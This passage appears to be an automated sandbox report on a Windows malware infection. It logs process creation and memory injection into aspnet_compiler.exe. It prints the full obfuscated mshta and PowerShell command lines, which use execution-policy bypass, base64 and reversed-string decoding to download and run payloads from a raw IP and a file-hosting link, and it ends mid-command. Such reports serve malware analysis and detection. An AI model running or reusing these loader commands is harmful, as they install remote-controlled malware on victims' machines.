[system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 10BA008	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF0FC.tmp" "c:\Users\user\AppData\Local\Temp\dnftngtc\CSC42D1BD9B7A4B404E9A5CB58F4B22157.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhbmwhrricagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc10evblicagicagicagicagicagicagicagicagicagicagicaglw1lbujlcmrlrmlusvrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpua1putfpuz1rclhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiezrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigxeqyx1aw50icagicagicagicagicagicagicagicagicagicagicagsgfwt1l2awhjleludfb0ciagicagicagicagicagicagicagicagicagicagicagie5qumnkq2pxktsnicagicagicagicagicagicagicagicagicagicagicaglu5htwugicagicagicagicagicagicagicagicagicagicagicait3jjwur2usigicagicagicagicagicagicagicagicagicagicagicattkftzxnwqwnficagicagicagicagicagicagicagicagicagicagicaguejvc0ltuiagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakcgzydfe6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzmzl3nlzw15ymvzdhroaw5nc3doawnoy2fsbhlvdwjhynlnaxjsd2hpy2hnaxzldwhvdgnoawnrcy50suyilcikrw5wokfquerbvefcc2vlbxlizxn0dghpbmdzd2hpy2hjywxsew91ymfiewdpcmx3agljagdpdmv1ac52ylmildasmck7u3rbunqtu0xlrvaomyk7suvyicagicagicagicagicagicagicagicagicagicagicagiirlbly6qvbqrefuqvxzzwvtewjlc3r0agluz3n3agljagnhbgx5b3viywj5z2lybhdoawnoz2l2zxvolnziuyi='+[char]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'awvyicggkcgnm1peaw1hz2vvcmwgpsbjdwfodhrwczovlzewmtcuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawxla2v5ptjbyv9iv285umv1ndv0n0jvmwtwz3nkoxbuoxbnu1nsdln0r3juveldzkzobvqnkydljysnajnmqzztuxrjy09jx1qznxcmcgtfdmlkpwzkngy2mtqnkydiyjiwjysnowm2mmmxnzmwjysnotq1mtc2yta5mccrjzrmiel1jysnytszwkr3zwjdbccrj2llbnqgpsbozxctt2jqzwn0ifn5cycrj3rlbs5ojysnzxquv2viq2xpzw50oznargltywdlqnl0zxmgpsazwkr3zwjdbgllbnqurg93bmxvywreyxrhkdnargltywdlvxjsktszwkrpbwfnzvrlehqgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkcnkydldfn0cmluzycrjygzwkrpbwfnzuj5dgvzktszwkrzdgfydezsjysnywcgpsbjdwe8pejbu0u2nf9tvefsvd4+sxvhoznargvuzezsywcgpsbjdwe8pejbu0u2nf9ftkq+pkl1jysnytszwkrzdgfydeluzgv4id0gm1peaw1hz2unkyduzxh0lkluzgv4t2yom1pec3rhcnrgbgfnktszwkrlbmrjbmrleca9idnargltywdlvgv4dc5jbmrlee9mkdnargvuzezsjysnywcpoznarhn0yxj0sw5kzxgglwdlidaglwfuzcazwkrlbmrjbmrlecatz3qgm1pec3rhcnrjbmrledszwkrzdgfydeluzgv4ics9idnarhn0yxj0rmxhzy5mzw5ndgg7m1peymfzzty0tgvuz3roid0gm1onkydezw5ksw5kzxgglsazwkrzdgfydeluzgv4jysnoznajysnrgjhc2u2jysnnenvbw1hbmqgpsazwkrpbwfnzvrlehquu3vic3ryaw5nkdnarhn0yxj0sw5kzxgsidnarginkydhc2u2nexlbmcnkyd0ack7m1peymfzzty0umv2zxjzzwqgpsatam9pbiaom1peymfzzty0q29tbwfuzc5ub0noyxjbcnjhesgpihp3dibgb3jfywnolu9iamvjdcb7idnarf8gjysnfslblscrjzeuli0om1peymfzzty0q29tbwfuzc5mzw5ndccrj2gpxtszwkrjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkdnargjhc2u2nfjldmvyc2unkydkktszwkrsb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgunkydjdglvbi5bc3nlbwjsev06okxvywqom1pey29tbwfuzej5dgunkydzktszwkr2ywlnzxrob2qgpsbbzg5sawiusu8usg9tzscrj10ur2v0twv0ag9kkel1yvzbsul1ysk7jysnm1pedmfptwv0ag9klkludm9rzsgzwkrudwxslcbakel1yxr4dc5ltedptc8zmy82mzeumzqyljmumjkxly86cccrj3r0ael1yscrjywgsxvhzccrj2vzyxrpdmfkb0l1yswgsxvhzgvzyxrpdmfkb0l1yswgsxvhzgvzyxrpdicrj2fkb0l1yswgsxvhyxnwbmv0x2nvbxbpbgvysxvhlcbjdwfkzxnhdgknkyd2ywrvsxvhlcbjdwfkzxnhdgl2ywrvsxvhlel1jysnywrlc2f0axzhzg9jdwessxvhzgvzyxrpdmfkb0l1ysxjdwfkzxnhdgl2ywrvsxunkydhlel1ywrlc2f0axzhzg9jdscrj2essxvhzgvzyxrpdmfkb0l1ysxjjysndwexsxvhlel1ywrlc2f0axzhzg9jdwepjysnktsnksaglunszxbsywnlkftdaefyxtczk1tdaefyxtexnytbq2hbcl05nyksw0noqxjdmzkglunszxbsywnlkftdaefyxtuxk1tdaefyxtkwk1tdaefyxty4ksxbq2hbcl0zni1dumvwbgfjzsagkftdaefyxteymitbq2hbcl0xmtkrw0noqxjdmte4ksxbq2hbcl0xmjqpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ( (('3zdimageurl = iuahttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmt'+'k'+'j3lc6sqticoc_t35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f iu'+'a;3zdwebcl'+'ient = new-object sys'+'tem.n'+'et.webclient;3zdimagebytes = 3zdwebclient.downloaddata(3zdimageurl);3zdimagetext = [system.text.encoding]::utf8.g'+'etstring'+'(3zdimagebytes);3zdstartfl'+'ag = iua<<base64_start>>iua;3zdendflag = iua<<base64_end>>iu'+'a;3zdstartindex = 3zdimage'+'text.indexof(3zdstartflag);3zdendindex = 3zdimagetext.indexof(3zdendfl'+'ag);3zdstartindex -ge 0 -and 3zdendindex -gt 3zdstartindex;3zdstartindex += 3zdstartflag.length;3zdbase64length = 3z'+'dendindex - 3zdstartindex'+';3z'+'dbase6'+'4command = 3zdimagetext.substring(3zdstartindex, 3zdb'+'ase64leng'+'th);3zdbase64reversed = -join (3zdbase64command.tochararray() zwv foreach-object { 3zd_ '+'})[-'+'1..-(3zdbase64command.lengt'+'h)];3zdcommandbytes = [system.convert]::frombase64string(3zdbase64reverse'+'d);3zdloadedassembly = [system.refle'+'ction.assembly]::load(3zdcommandbyte'+'s);3zdvaimethod = [dnlib.io.home'+'].getmethod(iuavaiiua);'+'3zdvaimethod.invoke(3zdnull, @(iuatxt.klgol/33/631.342.3.291//:p'+'tthiua'+', iuad'+'esativadoiua, iuadesativadoiua, iuadesativ'+'adoiua, iuaaspnet_compileriua, iuadesati'+'vadoiua, iuadesativadoiua,iu'+'adesativadoiua,iuadesativadoiua,iuadesativadoiu'+'a,iuadesativadoiu'+'a,iuadesativadoiua,i'+'ua1iua,iuadesativadoiua)'+');') -creplace([char]73+[char]117+[char]97),[char]39 -creplace([char]51+[char]90+[char]68),[char]36-creplace ([char]122+[char]119+[char]118),[char]124))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jhbmwhrricagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfkzc10evblicagicagicagicagicagicagicagicagicagicagicaglw1lbujlcmrlrmlusvrpt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtu9olkrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpua1putfpuz1rclhn0cmluzyagicagicagicagicagicagicagicagicagicagicagiezrlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagigxeqyx1aw50icagicagicagicagicagicagicagicagicagicagicagsgfwt1l2awhjleludfb0ciagicagicagicagicagicagicagicagicagicagicagie5qumnkq2pxktsnicagicagicagicagicagicagicagicagicagicagicaglu5htwugicagicagicagicagicagicagicagicagicagicagicait3jjwur2usigicagicagicagicagicagicagicagicagicagicagicattkftzxnwqwnficagicagicagicagicagicagicagicagicagicagicaguejvc0ltuiagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakcgzydfe6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzmzl3nlzw15ymvzdhroaw5nc3doawnoy2fsbhlvdwjhynlnaxjsd2hpy2hnaxzldwhvdgnoawnrcy50suyilcikrw5wokfquerbvefcc2vlbxlizxn0dghpbmdzd2hpy2hjywxsew91ymfiewdpcmx3agljagdpdmv1ac52ylmildasmck7u3rbunqtu0xlrvaomyk7suvyicagicagicagicagicagicagicagicagicagicagicagiirlbly6qvbqrefuqvxzzwvtewjlc3r0agluz3n3agljagnhbgx5b3viywj5z2lybhdoawnoz2l2zxvolnziuyi='+[char]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'awvyicggkcgnm1peaw1hz2vvcmwgpsbjdwfodhrwczovlzewmtcuzmlszw1hawwuy29tl2fwas9mawxll2dldd9mawxla2v5ptjbyv9iv285umv1ndv0n0jvmwtwz3nkoxbuoxbnu1nsdln0r3juveldzkzobvqnkydljysnajnmqzztuxrjy09jx1qznxcmcgtfdmlkpwzkngy2mtqnkydiyjiwjysnowm2mmmxnzmwjysnotq1mtc2yta5mccrjzrmiel1jysnytszwkr3zwjdbccrj2llbnqgpsbozxctt2jqzwn0ifn5cycrj3rlbs5ojysnzxquv2viq2xpzw50oznargltywdlqnl0zxmgpsazwkr3zwjdbgllbnqurg93bmxvywreyxrhkdnargltywdlvxjsktszwkrpbwfnzvrlehqgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkcnkydldfn0cmluzycrjygzwkrpbwfnzuj5dgvzktszwkrzdgfydezsjysnywcgpsbjdwe8pejbu0u2nf9tvefsvd4+sxvhoznargvuzezsywcgpsbjdwe8pejbu0u2nf9ftkq+pkl1jysnytszwkrzdgfydeluzgv4id0gm1peaw1hz2unkyduzxh0lkluzgv4t2yom1pec3rhcnrgbgfnktszwkrlbmrjbmrleca9idnargltywdlvgv4dc5jbmrlee9mkdnargvuzezsjysnywcpoznarhn0yxj0sw5kzxgglwdlidaglwfuzcazwkrlbmrjbmrlecatz3qgm1pec3rhcnrjbmrledszwkrzdgfydeluzgv4ics9idnarhn0yxj0rmxhzy5mzw5ndgg7m1peymfzzty0tgvuz3roid0gm1onkydezw5ksw5kzxgglsazwkrzdgfydeluzgv4jysnoznajysnrgjhc2u2jysnnenvbw1hbmqgpsazwkrpbwfnzvrlehquu3vic3ryaw5nkdnarhn0yxj0sw5kzxgsidnarginkydhc2u2nexlbmcnkyd0ack7m1peymfzzty0umv2zxjzzwqgpsatam9pbiaom1peymfzzty0q29tbwfuzc5ub0noyxjbcnjhesgpihp3dibgb3jfywnolu9iamvjdcb7idnarf8gjysnfslblscrjzeuli0om1peymfzzty0q29tbwfuzc5mzw5ndccrj2gpxtszwkrjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdojpgcm9tqmfzzty0u3ryaw5nkdnargjhc2u2nfjldmvyc2unkydkktszwkrsb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgunkydjdglvbi5bc3nlbwjsev06okxvywqom1pey29tbwfuzej5dgunkydzktszwkr2ywlnzxrob2qgpsbbzg5sawiusu8usg9tzscrj10ur2v0twv0ag9kkel1yvzbsul1ysk7jysnm1pedmfptwv0ag9klkludm9rzsgzwkrudwxslcbakel1yxr4dc5ltedptc8zmy82mzeumzqyljmumjkxly86cccrj3r0ael1yscrjywgsxvhzccrj2vzyxrpdmfkb0l1yswgsxvhzgvzyxrpdmfkb0l1yswgsxvhzgvzyxrpdicrj2fkb0l1yswgsxvhyxnwbmv0x2nvbxbpbgvysxvhlcbjdwfkzxnhdgknkyd2ywrvsxvhlcbjdwfkzxnhdgl2ywrvsxvhlel1jysnywrlc2f0axzhzg9jdwessxvhzgvzyxrpdmfkb0l1ysxjdwfkzxnhdgl2ywrvsxunkydhlel1ywrlc2f0axzhzg9jdscrj2essxvhzgvzyxrpdmfkb0l1ysxjjysndwexsxvhlel1ywrlc2f0axzhzg9jdwepjysnktsnksaglunszxbsywnlkftdaefyxtczk1tdaefyxtexnytbq2hbcl05nyksw0noqxjdmzkglunszxbsywnlkftdaefyxtuxk1tdaefyxtkwk1tdaefyxty4ksxbq2hbcl0zni1dumvwbgfjzsagkftdaefyxteymitbq2hbcl0xmtkrw0noqxjdmte4ksxbq2hbcl0xmjqpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "iex ( (('3zdimageurl = iuahttps://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmt'+'k'+'j3lc6sqticoc_t35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f iu'+'a;3zdwebcl'+'ient = new-object sys'+'tem.n'+'et.webclient;3zdimagebytes = 3zdwebclient.downloaddata(3zdimageurl);3zdimagetext = [system.text.encoding]::utf8.g'+'etstring'+'(3zdimagebytes);3zdstartfl'+'ag = iua<<base64_start>>iua;3zdendflag = iua<<base64_end>>iu'+'a;3zdstartindex = 3zdimage'+'text.indexof(3zdstartflag);3zdendindex = 3zdimagetext.indexof(3zdendfl'+'ag);3zdstartindex -ge 0 -and 3zdendindex -gt 3zdstartindex;3zdstartindex += 3zdstartflag.length;3zdbase64length = 3z'+'dendindex - 3zdstartindex'+';3z'+'dbase6'+'4command = 3zdimagetext.substring(3zdstartindex, 3zdb'+'ase64leng'+'th);3zdbase64reversed = -join (3zdbase64command.tochararray() zwv foreach-object { 3zd_ '+'})[-'+'1..-(3zdbase64command.lengt'+'h)];3zdcommandbytes = [system.convert]::frombase64string(3zdbase64reverse'+'d);3zdloadedassembly = [system.refle'+'ction.assembly]::load(3zdcommandbyte'+'s);3zdvaimethod = [dnlib.io.home'+'].getmethod(iuavaiiua);'+'3zdvaimethod.invoke(3zdnull, 